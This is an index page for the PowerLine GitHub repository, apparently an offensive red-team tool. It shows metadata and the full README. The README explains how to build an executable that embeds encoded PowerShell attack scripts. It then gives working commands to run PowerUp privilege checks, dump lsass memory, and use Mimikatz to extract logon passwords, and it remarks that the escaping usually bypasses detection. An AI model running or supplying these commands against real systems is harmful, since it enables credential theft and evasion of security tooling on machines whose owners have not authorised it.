Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/fullmetalcache/PowerLine
https://github.com/fullmetalcache/PowerLine
Last synced: about 2 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/fullmetalcache/PowerLine
- Owner: fullmetalcache
- Created: 2017-03-29T16:38:54.000Z (almost 8 years ago)
- Default Branch: master
- Last Pushed: 2018-12-17T21:52:58.000Z (about 6 years ago)
- Last Synced: 2024-08-05T17:24:18.261Z (6 months ago)
- Language: C#
- Size: 17 MB
- Stars: 301
- Watchers: 13
- Forks: 65
- Open Issues: 7
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - fullmetalcache/PowerLine - (C# #)
README
# PowerLine
Download the Repo
Run the build.bat file
Update the UserConf.xml document to contain the URLs of the scripts that you'd like to include (examples shown)
Run the PLBuilder.exe file
The PowerLine.exe program should now be created and contains embedded, xor-encoded, base64-encoded versions of all of the scripts that you specified
Example Usage:
//Shows scripts that are currently embedded in the program
PowerLine.exe -ShowScripts
//Run Invoke-AllChecks from the PowerUp script
PowerLine.exe PowerUp "Invoke-AllChecks"
//Get a dump of the lsass process. Must run as an admin
PowerLine.exe Out-Minidump "Get-Process lsass | Out-Minidump"
//Run mimikatz against the dump file created by the Out-Minidump command to extract creds. lsass_dump_name.dmp will be the name generated by Out-Minidump
//Yes, it's hellacious escaping but it works and usually bypasses detection =)
PowerLine.exe Invoke-Mimikatz "Invoke-Mimikatz -Command \"`\"sekurlsa::minidump lsass_dump_name.dmp`\" `\"sekurlsa::logonPasswords`\"\""